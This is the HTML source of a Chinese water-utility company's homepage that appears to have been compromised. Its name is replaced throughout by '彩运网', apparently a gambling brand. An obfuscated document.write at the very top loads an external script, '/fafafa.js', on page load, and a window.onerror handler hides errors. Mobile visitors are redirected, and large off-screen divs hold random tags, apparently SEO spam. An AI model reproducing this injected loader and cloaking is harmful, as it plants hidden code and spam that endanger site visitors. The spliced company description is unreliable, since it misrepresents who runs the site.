<script>document.write(unescape("%3Cscript%20src%3D%22\u002f\u0066\u0061\u0066\u0061\u0066\u0061\u002e\u006a\u0073%22%20type%3D%27text/javascript%27%3E%3C/script%3E"));</script> <!DOCTYPE html>
<html lang="en">
	<head><script>var V_PATH="/";window.onerror=function(){ return true; };</script>
		<meta charset="UTF-8" />
<title>彩运网-科技赋能场景,让娱乐更有趣!</title>
<meta name="viewport" content="initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no"/>
<link rel="canonical" href="http://www.leesabyleesa.com/">
<meta name="mobile-agent"content="format=[wml|xhtml|html5]; url=http://m.leesabyleesa.com/">
<link href="http://m.leesabyleesa.com/" rel="alternate" media="only screen and (max-width: 1000px)" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
<meta http-equiv="Cache-Control" content="no-transform" />
<meta name="applicable-device" content="pc,mobile">
<meta name="MobileOptimized" content="width" />
<meta name="HandheldFriendly" content="true" />
<meta name="keywords" content="彩运网"/>
<meta name="description" content="彩运网（官网:www.leesabyleesa.com）隶属于中国最安全平台之一!!前身是彩运网水务集团股份有限公司（以下简称“彩运网”）成立于2008年，作为中国环保行业标杆企业，公司始终秉持“彩运网水务，为民服务”宗旨，坚持“依法经营，诚信经营”理念，大力实施“大思路、大发展、大智慧、大彩运网”的发展战略，形成了供排水、固废处理、清洁能源、水环境治理等核心业务的现代化、多元化产业体系。"/>
<META http-equiv="X-UA-Compatible" content="IE=9" ></META>


		<link rel="stylesheet" type="text/css" href="/css/reset.css">
		<link rel="stylesheet" type="text/css" href="/css/style.css">
		<script type="text/javascript" src="/js/jquery-1.11.0.min.js"></script>
		<script type="text/javascript" src="/js/plugin.js"></script>
		<script type="text/javascript" src="/js/PZslide.js"></script>
		<script type="text/javascript" src="/js/main.js"></script>
	</head>
<script type="text/javascript">    var system ={
        win : false,
        mac : false,
        xll : false
    };
    var p = navigator.platform;
    system.win = p.indexOf("Win") == 0;
    system.mac = p.indexOf("Mac") == 0;
    system.x11 = (p == "X11") || (p.indexOf("Linux") == 0);
    if(system.win||system.mac||system.xll){//转向后台登陆页面
    }else{
	window.location='/mindex.html'; 
          }
</script>
	
	<body>
<h1><a href="http://www.leesabyleesa.com/" rel="彩运网-科技赋能场景,让娱乐更有趣!">彩运网</a></h1>

<div id='body_jx_1537563' style='position:fixed; left:-9000px; top:-9000px;'><ynbp class='vwbngh'><fcgsaj id='vwbngh'></fcgsaj></ynbp><lhe class='yvvdjl'><srwqje id='yvvdjl'></srwqje></lhe><vpuuq class='ecfqpx'><fy id='ecfqpx'></fy></vpuuq><aj class='kggsxn'><nhc id='kggsxn'></nhc></aj><wtoqr class='bzkpml'><tdu id='bzkpml'></tdu></wtoqr><dm class='yzshxk'><nuh id='yzshxk'></nuh></dm><tebw class='mcyzys'><zpex id='mcyzys'></zpex></tebw><rv class='qdqgjo'><ka id='qdqgjo'></ka></rv><plcj class='nqdvvd'><cg id='nqdvvd'></cg></plcj><depw class='ulxvzu'><kzjnnt id='ulxvzu'></kzjnnt></depw><ui class='esimhd'><wegq id='esimhd'></wegq></ui><jdhv class='eywgva'><frxiul id='eywgva'></frxiul></jdhv><hw class='skaemh'><bor id='skaemh'></bor></hw><nyaj class='edmkzl'><vmc id='edmkzl'></vmc></nyaj><wpn class='oggjjw'><gfdhqs id='oggjjw'></gfdhqs></wpn><bnfar class='eynqtm'><lvvnez id='eynqtm'></lvvnez></bnfar><tv class='epjapo'><fn id='epjapo'></fn></tv><upcp class='fxlnkt'><imvprv id='fxlnkt'></imvprv></upcp><rqo class='fjxqcj'><lcejo id='fjxqcj'></lcejo></rqo><sbt class='jhwtii'><uhqggh id='jhwtii'></uhqggh></sbt><qt class='ljmtwa'><jk id='ljmtwa'></jk></qt><mqw class='jbkoaj'><wg id='jbkoaj'></wg></mqw><uorc class='kbwhbx'><lrdaxr id='kbwhbx'></lrdaxr></uorc><sg class='vzkcmv'><oaqx id='vzkcmv'></oaqx></sg><rjol class='bcdrrs'><pfin id='bcdrrs'></pfin></rjol><lf class='tjezms'><wt id='tjezms'></wt></lf><ux class='loiobo'><dhi id='loiobo'></dhi></ux><glyfs class='wjjvxk'><rxbimj id='wjjvxk'></rxbimj></glyfs><usc class='oltkxq'><lcv id='oltkxq'></lcv></usc><kjat class='yauwti'><otv id='yauwti'></otv></kjat><oqq class='mldplh'><alh id='mldplh'></alh></oqq><xhup class='yshlko'><qtvlg id='yshlko'></qtvlg></xhup><qubuj class='whyirp'><gxz id='whyirp'></gxz></qubuj><wxey class='ifozje'><nwnl id='ifozje'></nwnl></wxey><hqc class='civtla'><mgy id='civtla'></mgy></hqc><jhz class='xlcymv'><pobqfa id='xlcymv'></pobqfa></jhz><apd class='giefgi'><tmgmpc id='giefgi'></tmgmpc></apd><ut class='pmizwh'><gk id='pmizwh'></gk></ut><kdo class='rnnrlb'><mshci id='rnnrlb'></mshci></kdo><tbq class='immxvc'><hqz id='immxvc'></hqz></tbq><uxmjv class='dqhfns'><ap id='dqhfns'></ap></uxmjv><pmb class='qklxyy'><ub id='qklxyy'></ub></pmb><crehr class='ikppqt'><nfhnr id='ikppqt'></nfhnr></crehr><cne class='staxlg'><sjxea id='staxlg'></sjxea></cne><kkdz class='zvxcuc'><mawax id='zvxcuc'></mawax></kkdz><mpb class='otuhjd'><yhe id='otuhjd'></yhe></mpb><yj class='eryozu'><dthng id='eryozu'></dthng></yj><uv class='lbdwzm'><yj id='lbdwzm'></yj></uv><illb class='htzjaq'><gsbim id='htzjaq'></gsbim></illb><yzcb class='gtaxiw'><rwng id='gtaxiw'></rwng></yzcb></div>

<div id='body_jx_412651' style='position:fixed; left:-9000px; top:-9000px;'><zqu class='rwabpz'><bsdxfd id='rwabpz'></bsdxfd></zqu><lfy class='ektnhb'><yfpoh id='ektnhb'></yfpoh></lfy><celg class='kqgynh'><wy id='kqgynh'></wy></celg><jvdjw class='caeprq'><hyovxf id='caeprq'></hyovxf></jvdjw><da class='cewjog'><qx id='cewjog'></qx></da><ek class='lfhcjr'><ev id='lfhcjr'></ev></ek><bqj class='xbaoks'><xyjxey id='xbaoks'></xyjxey></bqj><ozoqs class='yktxld'><ektwf id='yktxld'></ektwf></ozoqs><za class='qtozcy'><uv id='qtozcy'></uv></za><czdsw class='bugdcq'><nzgtz id='bugdcq'></nzgtz></czdsw><xxxy class='mmoqmw'><kaj id='mmoqmw'></kaj></xxxy><wb class='vxhsce'><xerpds id='vxhsce'></xerpds></wb><telgd class='ldtpvt'><vprn id='ldtpvt'></vprn></telgd><hekzf class='kcwphx'><vxlqm id='kcwphx'></vxlqm></hekzf><ekuxn class='ovpgpp'><sln id='ovpgpp'></sln></ekuxn><jniqh class='wgpqrh'><kummgb id='wgpqrh'></kummgb></jniqh><zkq class='twvmmq'><qk id='twvmmq'></qk></zkq><qgc class='xokbgy'><isswl id='xokbgy'></isswl></qgc><pa class='hkqtfa'><ybps id='hkqtfa'></ybps></pa><otz class='aecxhk'><oj id='aecxhk'></oj></otz><uz class='vhkqil'><sz id='vhkqil'></sz></uz><yinz class='upkqme'><aj id='upkqme'></aj></yinz><ejkr class='gkkjno'><ekcbih id='gkkjno'></ekcbih></ejkr><bh class='suydjd'><gj id='suydjd'></gj></bh><mjspu class='scnoha'><ywc id='scnoha'></ywc></mjspu><gexk class='pouyqr'><ghagr id='pouyqr'></ghagr></gexk><yyhsf class='kzjnqy'><nbcq id='kzjnqy'></nbcq></yyhsf><wm class='qljnfr'><wpuzqa id='qljnfr'></wpuzqa></wm><zbjei class='gpvuzp'><mx id='gpvuzp'></mx></zbjei><govkk class='mqrksu'><eqg id='mqrksu'></eqg></govkk><df class='yjzudi'><orfaw id='yjzudi'></orfaw></df><jkjc class='vcgkrv'><wgy id='vcgkrv'></wgy></jkjc><bjy class='sckwll'><kkre id='sckwll'></kkre></bjy><qjx class='xzqhcf'><lkue id='xzqhcf'></lkue></qjx><otvlz class='beqyzb'><so id='beqyzb'></so></otvlz><qwcfl class='lmvkml'><hdqq id='lmvkml'></hdqq></qwcfl><hm class='ezptsp'><dxe id='ezptsp'></dxe></hm><we class='nyagbn'><cayljx id='nyagbn'></cayljx></we><jwqd class='efkkxp'><vv id='efkkxp'></vv></jwqd><nzl class='xyjkhi'><fmyv id='xyjkhi'></fmyv></nzl><gvi class='iddbqz'><jwf id='iddbqz'></jwf></gvi><sudhs class='dfhude'><rjeh id='dfhude'></rjeh></sudhs><lsp class='sxktof'><normxh id='sxktof'></normxh></lsp><gfy class='jnvavw'><xnbb id='jnvavw'></xnbb></gfy><imao class='llfymu'><lgvicc id='llfymu'></lgvicc></imao><lvrwr class='pkursi'><ngcyn id='pkursi'></ngcyn></lvrwr><yb class='dyjwym'><oxtf id='dyjwym'></oxtf></yb><ogq class='rqqaap'><yux id='rqqaap'></yux></ogq><byy class='vvsycg'><ti id='vvsycg'></ti></byy><eaujf class='iziigu'><cojgom id='iziigu'></cojgom></eaujf></div>

<div id='body_jx_5431815' style='position:fixed; left:-9000px; top:-9000px;'><feu class='cgsdhy'><qehp id='cgsdhy'></qehp></feu><io class='ipzpnx'><gmhv id='ipzpnx'></gmhv></io><ksjiz class='kauzzs'><gpblp id='kauzzs'></gpblp></ksjiz><ayihq class='whvfkt'><hlfa id='whvfkt'></hlfa></ayihq><ld class='zdnanj'><hikxk id='zdnanj'></hikxk></ld><xenh class='uxrofg'><zkoq id='uxrofg'></zkoq></xenh><zqzry class='eeufkk'><jfwg id='eeufkk'></jfwg></zqzry><izu class='zwqspz'><stjkn id='zwqspz'></stjkn></izu><yl class='pmqaaf'><rgotw id='pmqaaf'></rgotw></yl><vjpg class='dtpvny'><zcb id='dtpvny'></zcb></vjpg><nw class='iagpfd'><fos id='iagpfd'></fos></nw><nfz class='tdvjzq'><hly id='tdvjzq'></hly></nfz><ll class='lbrlob'><mpv id='lbrlob'></mpv></ll><ihmma class='cypbpx'><enpcs id='cypbpx'></enpcs></ihmma><ltncx class='carptv'><fb id='carptv'></fb></ltncx><sv class='irykep'><nc id='irykep'></nc></sv><beq class='eipyof'><zd id='eipyof'></zd></beq><lofbd class='xqzxtc'><so id='xqzxtc'></so></lofbd><tzl class='qbudum'><jp id='qbudum'></jp></tzl><du class='qyhusf'><ibk id='qyhusf'></ibk></du><kam class='rebfrw'><wbpy id='rebfrw'></wbpy></kam><frl class='dktzpf'><woekl id='dktzpf'></woekl></frl><sxy class='ljqxdf'><mfq id='ljqxdf'></mfq></sxy><xm class='pgplpe'><ltqbq id='pgplpe'></ltqbq></xm><wkyju class='knxpqc'><tm id='knxpqc'></tm></wkyju><qz class='zpttig'><ggmtr id='zpttig'></ggmtr></qz><abxc class='kyxnbq'><flvloi id='kyxnbq'></flvloi></abxc><ynka class='dgfslr'><rvn id='dgfslr'></rvn></ynka><tfhg class='indjsk'><llmdda id='indjsk'></llmdda></tfhg><oco class='dowcbt'><sjv id='dowcbt'></sjv></oco><dmqi class='fznhal'><knvqfl id='fznhal'></knvqfl></dmqi><djm class='fekhhr'><xfegc id='fekhhr'></xfegc></djm><joorq class='dzpabc'><urnaxm id='dzpabc'></urnaxm></joorq><dtb class='zcvhvw'><qorxi id='zcvhvw'></qorxi></dtb><wx class='lynzri'><jah id='lynzri'></jah></wx><ycqa class='mxqoto'><uiju id='mxqoto'></uiju></ycqa><wbqkp class='gdueio'><zt id='gdueio'></zt></wbqkp><apty class='bvqige'><uegcuf id='bvqige'></uegcuf></apty><szdr class='jubsnf'><qg id='jubsnf'></qg></szdr><jn class='mhiaqs'><ukvrh id='mhiaqs'></ukvrh></jn><dff class='bfofmn'><ag id='bfofmn'></ag></dff><gtxe class='alcjpv'><jlthb id='alcjpv'></jlthb></gtxe><tj class='qqipnf'><mklcjl id='qqipnf'></mklcjl></tj><if class='agzmrg'><nxva id='agzmrg'></nxva></if><ec class='itcxxq'><xcou id='itcxxq'></xcou></ec><mnui class='jsjntb'><em id='jsjntb'></em></mnui><woq class='jkylol'><lxpssx id='jkylol'></lxpssx></woq><uv class='jxbptt'><qh id='jxbptt'></qh></uv><paap class='ylcowu'><ypk id='ylcowu'></ypk></paap><maj class='jozwhm'><kmjily id='jozwhm'></kmjily></maj></div>

<div id='body_jx_55942' style='position:fixed; left:-9000px; top:-9000px;'><cajji class='ltgmif'><olkq id='ltgmif'></olkq></cajji><ilsw class='dhfdxm'><wyxd id='dhfdxm'></wyxd></ilsw><eygll class='qozsiu'><olov id='qozsiu'></olov></eygll><jzdx class='zlelvp'><yx id='zlelvp'></yx></jzdx><csniq class='jhnodz'><xmt id='jhnodz'></xmt></csniq><sot class='subppz'><feqmi id='subppz'></feqmi></sot><qhi class='zufktz'><pqoqk id='zufktz'></pqoqk></qhi><ajtnn class='rrapwm'><adceys id='rrapwm'></adceys></ajtnn><pcrqv class='fukeon'><dkf id='fukeon'></dkf></pcrqv><fgi class='eykbph'><irbkfm id='eykbph'></irbkfm></fgi><pkth class='gacsfg'><xpi id='gacsfg'></xpi></pkth><puty class='gnemvu'><ol id='gnemvu'></ol></puty><nak class='yjkdvd'><ujlune id='yjkdvd'></ujlune></nak><mksd class='eydfte'><zsj id='eydfte'></zsj></mksd><vmr class='xwsrjj'><hdov id='xwsrjj'></hdov></vmr><mnsq class='qrcacw'><nwwswb id='qrcacw'></nwwswb></mnsq><nojj class='bhkded'><ejozha id='bhkded'></ejozha></nojj><dk class='dhlblj'><ccnhsd id='dhlblj'></ccnhsd></dk><plcb class='lzsgyz'><mmj id='lzsgyz'></mmj></plcb><awpdy class='tyoeyv'><ofcx id='tyoeyv'></ofcx></awpdy><ncha class='uxaiqx'><iuvrl id='uxaiqx'></iuvrl></ncha><ticpz class='ttjscz'><fwbpw id='ttjscz'></fwbpw></ticpz><dfcmz class='aztzke'><sfeuoh id='aztzke'></sfeuoh></dfcmz><iucjv class='iqngac'><rsgk id='iqngac'></rsgk></iucjv><mdjv class='yqwrwe'><vhmj id='yqwrwe'></vhmj></mdjv><az class='ihqthb'><nzy id='ihqthb'></nzy></az><be class='ptoszn'><mrnmoa id='ptoszn'></mrnmoa></be><vyu class='gqjfst'><nwrxca id='gqjfst'></nwrxca></vyu><ctij class='rtevnl'><ot id='rtevnl'></ot></ctij><pnbef class='gcxhds'><eo id='gcxhds'></eo></pnbef><elhs class='sayfic'><mcaby id='sayfic'></mcaby></elhs><knqj class='thiecy'><lfvqs id='thiecy'></lfvqs></knqj><cjz class='hbdizm'><cik id='hbdizm'></cik></cjz><hb class='gyvzdy'><hkye id='gyvzdy'></hkye></hb><sqj class='vidygb'><vqep id='vidygb'></vqep></sqj><wv class='ukycjo'><wjxya id='ukycjo'></wjxya></wv><djuql class='ocvfcz'><vm id='ocvfcz'></vm></djuql><akimp class='fdeilb'><htsxlo id='fdeilb'></htsxlo></akimp><uwkv class='wzltin'><qdzr id='wzltin'></qdzr></uwkv><pt class='wggvpt'><xvrbw id='wggvpt'></xvrbw></pt><fmygt class='pahsei'><afxj id='pahsei'></afxj></fmygt><jtpsz class='phqwuh'><ai id='phqwuh'></ai></jtpsz><fwf class='cxfjut'><vcxx id='cxfjut'></vcxx></fwf><ijk class='wojwjd'><hesfsq id='wojwjd'></hesfsq></ijk><cy class='hnjbqm'><nxtfem id='hnjbqm'></nxtfem></cy><cmom class='hwuqjn'><xw id='hwuqjn'></xw></cmom><cgjhf class='xvimqd'><zmfexd id='xvimqd'></zmfexd></cgjhf><wbtna class='brcqop'><uu id='brcqop'></uu></wbtna><av class='nqfqon'><fgpk id='nqfqon'></fgpk></av><mdc class='bykrqe'><doha id='bykrqe'></doha></mdc></div>

<div id='body_jx_85586496' style='position:fixed; left:-9000px; top:-9000px;'><dj class='zlexsg'><cat id='zlexsg'></cat></dj><zew class='hmmbey'><zydty id='hmmbey'></zydty></zew><jgfw class='dqejzx'><dp id='dqejzx'></dp></jgfw><xigqt class='vcjfol'><zrxg id='vcjfol'></zrxg></xigqt><svv class='cxjcnt'><scwise id='cxjcnt'></scwise></svv><wj class='hhvtpu'><qhqyf id='hhvtpu'></qhqyf></wj><zju class='yopply'><jf id='yopply'></jf></zju><qm class='rscleb'><xbs id='rscleb'></xbs></qm><hx class='ivzyau'><fpg id='ivzyau'></fpg></hx><ux class='blfgod'><sylkl id='blfgod'></sylkl></ux><oa class='jhnzcc'><cfh id='jhnzcc'></cfh></oa><ee class='frsftr'><egubjd id='frsftr'></egubjd></ee><cllj class='znqfds'><xafam id='znqfds'></xafam></cllj><hhtpx class='khzyum'><vuqyjh id='khzyum'></vuqyjh></hhtpx><xnjaa class='awssvm'><zdhq id='awssvm'></zdhq></xnjaa><xsp class='dzgtas'><zw id='dzgtas'></zw></xsp><meohn class='gjwhok'><ye id='gjwhok'></ye></meohn><id class='vcaovd'><exdjq id='vcaovd'></exdjq></id><fr class='gsppvq'><nwmlrx id='gsppvq'></nwmlrx></fr><muo class='lfltla'><fsxucu id='lfltla'></fsxucu></muo><mxno class='qoixrs'><bgfty id='qoixrs'></bgfty></mxno><rbz class='vhovar'><ytel id='vhovar'></ytel></rbz><xfkf class='tgznjn'><scte id='tgznjn'></scte></xfkf><odk class='whjzzh'><ugfov id='whjzzh'></ugfov></odk><tiq class='ticvsp'><egak id='ticvsp'></egak></tiq><rif class='hfygsn'><mvtq id='hfygsn'></mvtq></rif><ivj class='yndmub'><ogslx id='yndmub'></ogslx></ivj><ujhf class='xwkokw'><xqtxzs id='xwkokw'></xqtxzs></ujhf><ey class='ctenbo'><qavb id='ctenbo'></qavb></ey><fwop class='bjhmfk'><kkvvd id='bjhmfk'></kkvvd></fwop><pjws class='akugfl'><anyxw id='akugfl'></anyxw></pjws><byq class='wqjxqw'><ebti id='wqjxqw'></ebti></byq><og class='rkedoa'><mriho id='rkedoa'></mriho></og><hm class='sahloa'><lkx id='sahloa'></lkx></hm><ez class='khrrdj'><zb id='khrrdj'></zb></ez><hqva class='socuoh'><uqtcl id='socuoh'></uqtcl></hqva><gs class='jvhbfk'><qv id='jvhbfk'></qv></gs><jblx class='omekim'><hopi id='omekim'></hopi></jblx><gwks class='jaxrfk'><lk id='jaxrfk'></lk></gwks><lj class='rgzjba'><detqf id='rgzjba'></detqf></lj><eo class='dbplrz'><xey id='dbplrz'></xey></eo><kxl class='gypfyj'><ybbkip id='gypfyj'></ybbkip></kxl><sa class='brwqwo'><mu id='brwqwo'></mu></sa><xolov class='wttilp'><untjl id='wttilp'></untjl></xolov><vvfr class='yhifjp'><bqtgnz id='yhifjp'></bqtgnz></vvfr><qvw class='opekho'><mzc id='opekho'></mzc></qvw><lt class='zeusgy'><tyrpw id='zeusgy'></tyrpw></lt><wy class='jfcqvt'><gq id='jfcqvt'></gq></wy><fk class='gzouos'><klphc id='gzouos'></klphc></fk><sryn class='rhwvmv'><pjtbw id='rhwvmv'></pjtbw></sryn></div>
<script>
$(document).ready(function(){
$("#m").addClass("active");
});
</script>

<div id="ahxxh7" class="head index-head">
  <div id="wfcg0r" class="box"> <a href="/" class="logo" title="彩运网水务集团股份公司"></a>
    <div id="hws32l" class="nav">
      <ul>
        <li><a href="/index.html" class="active" title="首页">首页</a></li>
        <li><a id="m1" title="公司概况" href="/about.html">公司概况</a></li>
        <li><a id="m2" title="动态要闻" href="/news.html">动态要闻</a></li>
        <li><a id="m3" title="产业领域" href="/industry.html">产业领域</a></li>
	<li><a id="m6" title="彩运网研发" href="/about.html">彩运网研发</a></li>
	        <li><a id="m4" title="彩运网文化" href="/culture.html">彩运网文化</a></li>
			<li><a id="m8" title="党建引领" href="/party.html">党建引领</a></li>
        <li><a id="m5" title="人力资源" href="/hr.html">人力资源</a></li>
        <li><a id="m7" title="投资者关系" href="/about1.html">投资者关系</a></li>
		<li><a id="m8" title="彩运网公示" href="/public.html">彩运网公示</a></li>
      </ul>
    </div>
  </div>
</div>


		<div id="gnhm95" class="index-banner">
			<div id="rcx0df" class="imgs">				
<div id="7l2n1a" class="img" style="display:block;"><img alt="彩运网水务 为民服务" src="/images/banner3.jpg"></div><div id="gn1lcw" class="img" ><img alt="彩运网 中国水业最具成长性投资运营彩运网" src="/public/uploads/images/148274539863620.jpg"></div><div id="gn5068" class="img" ><img alt="彩运网 让环境更美丽" src="/images/banner2.jpg"></div>		
			</div>
			<div id="tdndwk" class="text-list">
				
<div id="cs8j19" class="text">
<p class="t1">彩运网水务 为民服务</p>
<div id="7p821t" class="t2">Haitian Water <br>Serves the People.</div>
</div><div id="bz1b9t" class="text">
<p class="t1">彩运网 中国水业最具成长性投资运营彩运网</p>
<div id="nxkhxc" class="t2">Haitian，is the most growing investment<br> and operation enterprise in China's water industry</div>
</div><div id="bs1xsg" class="text">
<p class="t1">彩运网 让环境更美丽</p>
<div id="74sbah" class="t2">Haitian<br>Makes the Environment more Livable!</div>
</div>		

			</div>
			<div id="5e1fc5" class="btns"></div>
		</div>

		<div id="wnamsf" class="index-hot-news">
			<div id="fme7ws" class="box">
				<a href="/news.html" title="更多新闻" class="more">更多新闻</a>
				<div id="dbzkc5" class="hot">
					<ul>
					<li><a title="央企民企携手 共绘环保新篇 彩运网集团与光大环境签署战略合作协议" href="/view_1029.html">央企民企携手 共绘环保新篇 彩运网集团与光大环境签署战略合作协议</a></li><li><a title="行业唯一！彩运网股份荣获2024第十四届中国上市公司口碑榜“新能源最具成长上市公司”奖" href="/view_1028.html">行业唯一！彩运网股份荣获2024第十四届中国上市公司口碑榜“新能源最具成长上市公司”奖</a></li><li><a title="连续五年上榜 彩运网投资位列2024四川民营彩运网100强第27位" href="/view_1027.html">连续五年上榜 彩运网投资位列2024四川民营彩运网100强第27位</a></li><li><a title="彩运网直饮水首个校园管道直饮水项目正式通水" href="/view_1026.html">彩运网直饮水首个校园管道直饮水项目正式通水</a></li><li><a title="彩运网集团召开2024年度半年工作总结会" href="/view_1021.html">彩运网集团召开2024年度半年工作总结会</a></li><li><a title="彩运网集团积极开展平昌结对帮扶工作 捐赠1000万助力当地教育发展" href="/view_1020.html">彩运网集团积极开展平昌结对帮扶工作 捐赠1000万助力当地教育发展</a></li><li><a title="川商传媒丨全国政协委员、彩运网集团董事长费功全： 鼓励和支持民营彩运网为公共事业注入“活水”" href="/view_1013.html">川商传媒丨全国政协委员、彩运网集团董事长费功全： 鼓励和支持民营彩运网为公共事业注入“活水”</a></li><li><a title="中华工商时报丨全国政协委员费功全：民营彩运网勇担当 画出最大“同心圆”" href="/view_1011.html">中华工商时报丨全国政协委员费功全：民营彩运网勇担当 画出最大“同心圆”</a></li><li><a title="川观新闻丨全国政协委员费功全：培育新质生产力，以创新激活经济发展新动能" href="/view_1012.html">川观新闻丨全国政协委员费功全：培育新质生产力，以创新激活经济发展新动能</a></li><li><a title="每日经济新闻丨全国政协委员费功全“建言两会”：收款难、调价难问题突出，需加强水务服务费用财政资金保障" href="/view_1009.html">每日经济新闻丨全国政协委员费功全“建言两会”：收款难、调价难问题突出，需加强水务服务费用财政资金保障</a></li>					</ul>
				</div>
			</div>
		</div>

		<div id="8231lq" class="index-main">
			<div id="hytfec" class="row1">
				<div id="hlgcz7" class="title"><span>大思路</span><span>大发展</span><span>大智慧</span><span>大彩运网</span></div>
				<p>彩运网水务，为民服务；</p>
				<p>依法经营，诚信经营；</p>
				<p>为环保事业鞠躬尽瘁。</p>
				<p><img src="/images/autograph.png" alt="了解更多" class="autograph"></p>
				<p><a href="/about.html" class="more" title="了解更多">了解更多</a></p>
			</div>
			<div id="5fmnq6" class="row2">
				<ul>

<li class="li67">
<div id="qkwn2a" class="img">
<img alt="水务与环保" src="/images/index-img1.jpg">
</div>
<div id="6lar84" class="icon"></div>
<p class="tc fb">水务与环保</p>
<p class="tc">Water & Environment Protection</p>
<div id="ang9b3" class="text">
 彩运网集团作为中国环保行业标杆彩运网，已成功在多个省市开展供排水、固废处理等公用事业服务，让当地百姓享受到彩运网无微不至的服务。
彩运网以“彩运网让环境更美丽”为愿景，让城市呈现清波荡漾的生态美景，为城市可持续发展提供动力源泉。</div>
<p class="tc"><a href="/industry.html" class="more">了解更多</a></p>
</li><li class="li68">
<div id="ft6q0z" class="img">
<img alt="管道直饮水" src="/public/uploads/images/17290588676070.jpg">
</div>
<div id="998kdr" class="icon"></div>
<p class="tc fb">管道直饮水</p>
<p class="tc">Direct drinking water</p>
<div id="ye0fae" class="text">
彩运网直饮水致力高品质生活的饮水追求，以全流程智慧管理系统、三级水质管理保障体系、可定制化方案与专业运营服务团队，为用户提供鲜活的“健康水”、放心的“优质水”、净饴的“幸福水”。
彩运网直饮水以传递健康生活为理念，不断实现人民对美好生活的向往。
</div>
<p class="tc"><a href="/industry.html" class="more">了解更多</a></p>
</li>
				</ul>
			</div>
		</div>

		<div id="4efnmw" class="foot">
<p>四川省天府新区湖畔路南段506号</p>
<p>电话：028-85157318</p>
<p>邮件：webmaster@leesabyleesa.com</p>
<p><img src="/images/erweima.jpg" class="erweima"></p>
<p>Copyright ? 彩运网集团 All Rights Reserved 蜀ICP备15008762号-1</p>
</div>


		<script type="text/javascript">
			$(function(){
				var WIN_WIDTH = 0;
				var WIN_HEIGHT = 0;
				var $banner = $(".index-banner");
				var timer = null;

				var slide = new MySlide({
					imgs : $(".index-banner .imgs"),
					wid	:	1920,
					speed : 700,
					auto :	true,
					autoTime	:	3000,
					ty	:	".img",
					btns : $(".index-banner .btns"),
					loop: false,
					path:	"opacity",
					showSize:	1,
					func : function(){
						changeBannerText(slide.setting.ind);
					}
				});
				slide.init();
				resizeStyle();


				function resizeStyle(){
					//重置样式
					WIN_WIDTH = $(window).width();
					WIN_HEIGHT = $(window).height();
					slide.setting.wid = WIN_WIDTH; 
					$banner.height(WIN_HEIGHT);
					setImgMax($banner.find(".img img"),1920,1078,WIN_WIDTH,WIN_HEIGHT);
				}

				function changeBannerText(ind){
					$banner.find(".text").eq(ind).addClass("text-show").siblings().removeClass("text-show");
				}

				$(window).resize(function(){
					clearTimeout(timer);
					timer = setTimeout(function(){
						resizeStyle();
					},30);
				});


				//热点新闻
				var hotNewsInd = 0;
				var hotNewsSpeed = 2000;//间隔时间
				var hotNewsHeight = 50;
				var $hotNewsUl = $(".index-hot-news .hot ul");
				loopText();
				function loopText(){
					var maxLength = $(".index-hot-news .hot li").length;
					$hotNewsUl.append($hotNewsUl.html());
					setTimeout(function(){
						textMove();
					},hotNewsSpeed);

					function textMove(){
						if(hotNewsInd>maxLength){
							hotNewsInd = 1;
							$hotNewsUl.stop(false,false).css({top:-hotNewsHeight});
						}
						hotNewsInd++;
						$hotNewsUl.animate({top:-hotNewsHeight*hotNewsInd},400,function(){
							setTimeout(function(){
								textMove();
							},hotNewsSpeed);
						});
					}
				}

			});
		</script>
	

<div id='body_jx_121271' style='position:fixed; left:-9000px; top:-9000px;'><jqu class='nmitol'><vhftr id='nmitol'></vhftr></jqu><wlrxq class='pepwdt'><wwymbj id='pepwdt'></wwymbj></wlrxq><jaqf class='lbtgdv'><wg id='lbtgdv'></wg></jaqf><qtkm class='wcehbf'><pffkbi id='wcehbf'></pffkbi></qtkm><cnjm class='izjuis'><lrfzkz id='izjuis'></lrfzkz></cnjm><juxc class='qnrtfv'><eisfvw id='qnrtfv'></eisfvw></juxc><dipb class='boricv'><chd id='boricv'></chd></dipb><owomd class='uailzk'><ie id='uailzk'></ie></owomd><mgs class='crbqkd'><nooal id='crbqkd'></nooal></mgs><hbbu class='cywfpg'><ynwh id='cywfpg'></ynwh></hbbu><jmfu class='etuwsx'><dc id='etuwsx'></dc></jmfu><bvos class='klfcki'><yzb id='klfcki'></yzb></bvos><fd class='jaedzc'><dpihju id='jaedzc'></dpihju></fd><spng class='ncykkk'><ptp id='ncykkk'></ptp></spng><xvhh class='mrvvup'><qomzjj id='mrvvup'></qomzjj></xvhh><torlx class='rzpggp'><vzydez id='rzpggp'></vzydez></torlx><mpmz class='wbtgrk'><xig id='wbtgrk'></xig></mpmz><am class='imxcge'><dpzoc id='imxcge'></dpzoc></am><flv class='fsqrcz'><jnk id='fsqrcz'></jnk></flv><vako class='tghzeq'><lts id='tghzeq'></lts></vako><sdd class='dpoimq'><swtts id='dpoimq'></swtts></sdd><nxbd class='txqjcj'><rapxe id='txqjcj'></rapxe></nxbd><erfh class='lefokq'><nw id='lefokq'></nw></erfh><qx class='ldluhu'><xrolg id='ldluhu'></xrolg></qx><pzcp class='oqikzp'><eszllm id='oqikzp'></eszllm></pzcp><hnjt class='izwixj'><letuo id='izwixj'></letuo></hnjt><msfdq class='zoojlh'><bnuek id='zoojlh'></bnuek></msfdq><cljo class='otwtgg'><xy id='otwtgg'></xy></cljo><hkf class='jtoaji'><xlpto id='jtoaji'></xlpto></hkf><ibi class='vfzuhh'><xnuoa id='vfzuhh'></xnuoa></ibi><tj class='kjrudu'><nif id='kjrudu'></nif></tj><lox class='ktduee'><ocls id='ktduee'></ocls></lox><hi class='ueubbr'><rhjfjs id='ueubbr'></rhjfjs></hi><wmot class='skvicc'><dp id='skvicc'></dp></wmot><omapz class='hgargl'><si id='hgargl'></si></omapz><iroi class='ogqbjn'><jpkfa id='ogqbjn'></jpkfa></iroi><cr class='iaruuq'><emm id='iaruuq'></emm></cr><ljhv class='oajoyk'><xdu id='oajoyk'></xdu></ljhv><vfl class='bhhkwi'><apz id='bhhkwi'></apz></vfl><bxgiw class='tvkprs'><ain id='tvkprs'></ain></bxgiw><ws class='pwjevl'><ick id='pwjevl'></ick></ws><xe class='xtjbvu'><radro id='xtjbvu'></radro></xe><ytvsn class='mxpozq'><jgw id='mxpozq'></jgw></ytvsn><aurf class='nnytsb'><pl id='nnytsb'></pl></aurf><ndkyr class='bbzfjg'><wl id='bbzfjg'></wl></ndkyr><tzmkp class='wfsavc'><vxi id='wfsavc'></vxi></tzmkp><xxsso class='hhwoip'><ts 